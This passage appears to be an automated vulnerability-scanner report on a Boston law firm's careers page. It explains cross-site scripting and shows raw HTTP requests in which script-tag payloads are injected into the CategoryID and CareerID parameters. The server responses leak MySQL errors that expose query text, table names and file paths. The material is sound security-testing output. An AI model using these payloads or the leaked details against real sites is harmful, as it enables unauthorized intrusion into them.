ADVISORS"/></a> </div></div><!-- body end --> <!--- sIFR script ---><script type="text/javascript">//<![CDATA[// Load the sIFR font for the feed's title.if(typeof sIFR == "function"){ sIFR.replaceElement(named({sSelector:"h1", sFlashSrc:"./_sifr/century.swf", sColor:"#244185", sHoverColor:"#666666", sBgColor:"#ffffff", sFlashVars:""})); //sIFR.replaceElement(named({sSelector:"h1", sFlashSrc:"./_sifr/georgia.swf", sColor:"#244185", sHoverColor:"#666666", sBgColor:"#ffffff", sFlashVars:""}));};//]]></script> <!-- footer start --> <div id="footerArea"> <span>Copyright © 2011 Nutter McClennen & Fish LLP. All rights reserved.</span> <span>Boston, Massachusetts, USA 617.439.2000 | Hyannis 508.790.5400</span> <span id="footerLinks">See DISCLAIMER on front page | <a href="http://www.nutter.com/sitemap.php" title="Site Map">Site Map</a></span> <span id="footerSite">www.nutter.com</span> </div> <!-- footer end --> </div> </body> </html> <!-- careers end -->
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript ) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
Parameters
Parameter
Type
Value
CategoryID
GET
23 '"--></style></script><script>alert(0x000006)</script>
CareerID
GET
17
SectionID
GET
380
Request
GET /careers.php?CategoryID=23%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000006)%3C%2Fscript%3E&CareerID=17&SectionID=380 HTTP/1.1 Referer: http://www.nutter.com/careers.php?CategoryID=23 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:10:53 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Transfer-Encoding: chunked Content-Type: text/html <!-- careers start -->error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\0\'\"--></style></script><script>netsparker(0x000006)</script>' at line 1 | 1064<BR>sql: SELECT CategoryName FROM _categories WHERE CategoryID=23\0\'\"--></style></script><script>netsparker(0x000006)</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Careers : Nutter McClennen & Fish LLP--> <title>Careers : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.careers.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.careers.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start --> <div id="printHeader"> <img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/> </div> <div id="bodyContainer"> <div id="headerArea"> <ul> <li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li> <li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li> <li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li> </ul> <form method="get" id="searchField" action="http://www.nutter.com/search.php"> <div id="siteSearch"> <input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/> </div> </form> </div> <!-- header end --> <!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent"> error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\0\'\"--></style></script><script>netsparker(0x000006)</script> LIMIT 1' at line 1 | 1064<BR>sql: SELECT CategoryName FROM _categories WHERE IsActive='y' AND CategoryID=23\0\'\"--></style></script><script>netsparker(0x000006)</script> LIMIT 1<br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>75</b><br /><ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.221.jpg" width="450" height="124" id="smallImage"><h2></h2><ul id="categoryNav"><li><a href="javascript:void(0)" title="Law Students">Law Students</a> <ul> <li class="Top"><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=3&subID=1" title="Summer Associate Program">Summer Associate Program</a></li> <li><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=4&subID=1" title="Fall Recruiting">Fall Recruiting</a></li> </ul> </li><li><a href="http://www.nutter.com/careers.php?CategoryID=23" title="Laterals" class="Left">Laterals</a><li><a href="http://www.nutter.com/careers.php?CategoryID=24" title="Administrative Staff" class="Left">Administrative Staff</a> </ul> <div id="subNav" class="Raised"> <h3><img src="/media/aboutus/media.343.gif" border="0" title="" alt=""></h3> <ul> <li><a href="http://www.nutter.com/careers.php?CategoryID=23\0\'\"--></style></script><script>netsparker(0x000006)</script>&CareerID=17&SectionID=380" title="Overview" class="hiliteBox">Overview</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23\0\'\"--></style></script><script>netsparker(0x000006)</script>&CareerID=5&SectionID=378" title="Open Positions">Open Positions</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23\0\'\"--></style></script><script>netsparker(0x000006)</script>&CareerID=7&SectionID=367" title="Diversity">Diversity</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23\0\'\"--></style></script><script>netsparker(0x000006)</script>&CareerID=8&SectionID=384" title="Nutter's Clients">Nutter's Clients</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23\0\'\"--></style></script><script>netsparker(0x000006)</script>&CareerID=9&SectionID=382" title="Pro Bono & Community Service">Pro Bono & Community Service</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23\0\'\"--></style></script><script>netsparker(0x000006)</script>&CareerID=10&SectionID=361" title="Training & Mentoring">Training & Mentoring</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23\0\'\"--></style></script><script>netsparker(0x000006)</script>&CareerID=11&SectionID=374" title="Benefits">Benefits</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23\0\'\"--></style></script><script>netsparker(0x000006)</script>&CareerID=19&SectionID=1041" title="AmLaw Mid-Level Associates Survey">AmLaw Mid-Level Associates Survey</a></li> </ul><!-- dkoleba 2010/11/11 start --> <a href="http://www.nutter.com/media/news/media.669.pdf" target="_blank" style="border: 0;"><img src="../media/images/Midlevel_2010_Nutter2_114v1.jpg" width="114" border="0" style="margin-top: 15px; margin-left: 8px;"></a><!-- <a href="/publications_events.php?NewsID=689" style="border-bottom: 0px;"><img src="../media/images/2008BestPlaces.jpg" alt="Best Places to Work - Boston Business Journal 2008" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a> <br/> <a href="../media/images/media.bestplacetowork.pdf" target="_blank" style="border-bottom: 0px;"><img src="../media/images/marketinglogocolorfinal.jpg" alt="The Boston Globe - GLOBE100's - Top Places to Work '08" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a>dkoleba 2010/11/11 end --></div><div id="NarrativeText"><p><a href="/media/news/media.669.pdf" target="_blank"><strong>Nutter Ranks #1 Nationally for Associate Satisfaction for Third Consecutive Year</strong></a></p>If you want a challenging and supportive environment in which to advance your career, then we invite you to explore joining Nutter.<br /><br />For Associate or Technical Specialists opportunities, please contact:<br /><p>Terese Cunningham, Director of Legal Recruitment<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />Email: <a target="_blank" href="mailto: tcunningham@nutter.com">tcunningham@nutter.com</a><br />Phone: 617-439-2351<br /></p><p>For Partnership opportunities, please contact: <br /></p><p>James E. Dawson, Esq.<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />E-mail:<a target="_blank" href="mailto: jdawson@nutter.com"> jdawson@nutter.com</a><br />Phone: 617-439-2623 <br /></p></div> </div><h1><a href="http://www.nutter.com/home.php" title="Nutter McClennen & Fish"><span>Careers : Nutter McClennen & Fish LLP</span></a></h1><div id="Navigation"> <a href="http://www.nutter.com/about.php" title="ABOUT US" onmouseover="rollover('about', 'http://www.nutter.com/media/leftNav/about_over.gif')" onmouseout="rollover('about', 'http://www.nutter.com/media/leftNav/about.gif')"><img src="http://www.nutter.com/media/leftNav/about.gif" name="about" alt="ABOUT US"/></a><a href="http://www.nutter.com/client_services.php" title="CLIENT SERVICES" onmouseover="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services_over.gif')" onmouseout="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services.gif')"><img src="http://www.nutter.com/media/leftNav/..
Parameters
Parameter
Type
Value
CategoryID
GET
23
CareerID
GET
17 '"--></style></script><script>alert(0x00000C)</script>
SectionID
GET
380
Request
GET /careers.php?CategoryID=23&CareerID=17%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000C)%3C%2Fscript%3E&SectionID=380 HTTP/1.1 Referer: http://www.nutter.com/careers.php?CategoryID=23 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:11:56 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Transfer-Encoding: chunked Content-Type: text/html <!-- careers start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Laterals : Careers : Nutter McClennen & Fish LLP--> <title>Laterals : Careers : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.careers.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.careers.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start --> <div id="printHeader"> <img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/> </div> <div id="bodyContainer"> <div id="headerArea"> <ul> <li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li> <li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li> <li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li> </ul> <form method="get" id="searchField" action="http://www.nutter.com/search.php"> <div id="siteSearch"> <input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/> </div> </form> </div> <!-- header end --> <!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent"> <ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.221.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.362.gif" border="0" title="" alt=""></h2><ul id="categoryNav"><li><a href="javascript:void(0)" title="Law Students">Law Students</a> <ul> <li class="Top"><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=3&subID=1" title="Summer Associate Program">Summer Associate Program</a></li> <li><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=4&subID=1" title="Fall Recruiting">Fall Recruiting</a></li> </ul> </li><li><a href="http://www.nutter.com/careers.php?CategoryID=23" title="Laterals" class="Left" id="hilited">Laterals</a><li><a href="http://www.nutter.com/careers.php?CategoryID=24" title="Administrative Staff" class="Left">Administrative Staff</a> </ul> <div id="subNav" class="Raised"> <h3><img src="/media/aboutus/media.343.gif" border="0" title="" alt=""></h3> <ul> <li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=17&SectionID=380" title="Overview" class="hiliteBox">Overview</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=5&SectionID=378" title="Open Positions">Open Positions</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=7&SectionID=367" title="Diversity">Diversity</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=8&SectionID=384" title="Nutter's Clients">Nutter's Clients</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=9&SectionID=382" title="Pro Bono & Community Service">Pro Bono & Community Service</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=10&SectionID=361" title="Training & Mentoring">Training & Mentoring</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=11&SectionID=374" title="Benefits">Benefits</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=19&SectionID=1041" title="AmLaw Mid-Level Associates Survey">AmLaw Mid-Level Associates Survey</a></li> </ul><!-- dkoleba 2010/11/11 start --> <a href="http://www.nutter.com/media/news/media.669.pdf" target="_blank" style="border: 0;"><img src="../media/images/Midlevel_2010_Nutter2_114v1.jpg" width="114" border="0" style="margin-top: 15px; margin-left: 8px;"></a><!-- <a href="/publications_events.php?NewsID=689" style="border-bottom: 0px;"><img src="../media/images/2008BestPlaces.jpg" alt="Best Places to Work - Boston Business Journal 2008" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a> <br/> <a href="../media/images/media.bestplacetowork.pdf" target="_blank" style="border-bottom: 0px;"><img src="../media/images/marketinglogocolorfinal.jpg" alt="The Boston Globe - GLOBE100's - Top Places to Work '08" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a>dkoleba 2010/11/11 end --></div>error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\0\'\"--></style></script><script>netsparker(0x00000C)</script>' at line 1 | 1064<BR>sql: SELECT CareerTitle FROM careers WHERE CareerID=17\0\'\"--></style></script><script>netsparker(0x00000C)</script><div id="NarrativeText"><p><a href="/media/news/media.669.pdf" target="_blank"><strong>Nutter Ranks #1 Nationally for Associate Satisfaction for Third Consecutive Year</strong></a></p>If you want a challenging and supportive environment in which to advance your career, then we invite you to explore joining Nutter.<br /><br />For Associate or Technical Specialists opportunities, please contact:<br /><p>Terese Cunningham, Director of Legal Recruitment<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />Email: <a target="_blank" href="mailto: tcunningham@nutter.com">tcunningham@nutter.com</a><br />Phone: 617-439-2351<br /></p><p>For Partnership opportunities, please contact: <br /></p><p>James E. Dawson, Esq.<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />E-mail:<a target="_blank" href="mailto: jdawson@nutter.com"> jdawson@nutter.com</a><br />Phone: 617-439-2623 <br /></p></div> </div><h1><a href="http://www.nutter.com/home.php" title="Nutter McClennen & Fish"><span>Laterals : Careers : Nutter McClennen & Fish LLP</span></a></h1><div id="Navigation"> <a href="http://www.nutter.com/about.php" title="ABOUT US" onmouseover="rollover('about', 'http://www.nutter.com/media/leftNav/about_over.gif')" onmouseout="rollover('about', 'http://www.nutter.com/media/leftNav/about.gif')"><img src="http://www.nutter.com/media/leftNav/about.gif" name="about" alt="ABOUT US"/></a><a href="http://www.nutter.com/client_services.php" title="CLIENT SERVICES" onmouseover="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services_over.gif')" onmouseout="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services.gif')"><img src="http://www.nutter.com/media/leftNav/client_services.gif" name="client_services" alt="CLIENT SERVICES"/></a><a href="http://www.nutter.com/attorneys.php" title="ATTORNEYS" onmouseover="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys_over.gif')" onmouseout="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys.gif')"><img src="http://www.nutter.com/media/leftNav/attorneys.gif" name="attorneys" alt="ATTORNEYS"/></a><a href="http://www.nutter.com/publications_events.php" title="PUBLICATIONS & EVENTS" onmouseover="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events_over.gif')" onmouseout="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events.gif')"><img 